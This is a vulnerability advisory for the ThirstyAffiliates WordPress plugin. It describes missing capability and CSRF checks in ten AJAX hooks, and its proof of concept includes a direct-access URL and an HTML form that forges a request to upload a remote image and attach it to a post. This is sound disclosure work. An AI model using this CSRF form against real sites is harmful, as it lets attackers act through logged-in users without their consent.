ThirstyAffiliates [Multiple Vulnerabilities]

Description

IMPORTANT Some if not all of those issues were reported to plugin author by James Golovich as stated in plugin changelog v2.6.2. I asked further clarification from James so content of this report might get updated as soon as I have it.

Multiple vulnerabilities were found in ThirstyAffiliates plugin. The root cause is lack of capabilities and anti-csrf token checks in AJAX hooks registered by this plugin.

A registered user account is required to exploit those vulnerabilities because all actions are privileged. No specific capabilities are required though.

Vulnerable AJAX hooks are:

  1. thirstyExportGlobalSettings
  2. thirstyImportGlobalSettings
  3. thirstyLinkPickerSearch
  4. thirstyUploadImageFromUrl
  5. thirstyAttachImageToLink
  6. thirstyUnattachImageFromLink
  7. thirstyGetLinkCode
  8. thirstyGetThickboxContent
  9. thirstyGetQuickAddLinkThickboxContent
  10. quickCreateAffiliateLink

1 and 2 are import and export plugin options so they should be available only to users with administrative rights.

All other actions are relative to listing, creating and changing specific links. Plugin author added the requirement for edit_posts capability to perform those action on v2.6.2 which is supposed to patch those issues. Even though CSRF attacks are still possible for most of those action because no prevention mechanism is implemented when performing them.

PoC

Direct access

Use the following URL to create arbitrary links: http://sbwp1.dev/wp-admin/admin-ajax.php?action=thirstyGetQuickAddLinkThickboxContent

The form displayed in the above link is actually use the quickCreateAffiliateLink AJAX action to create links.

CSRF

The following form will upload an image from http://dansilivestru.github.io/phonegap-day-slides/images/pwnage.png and attached it to post with ID 1.

<form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="thirstyUploadImageFromUrl" />
    <input type="hidden" name="imgUrl" value="http://dansilivestru.github.io/phonegap-day-slides/images/pwnage.png" />
    <input type="hidden" name="postId" value="1" />
    <input type="submit" value="Click Me" />
</form>

Solution

Capabilities checks were implemented on v2.6.2 but CSRF vulnerabilities still exists.

WordPress Plugins CSRF
INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX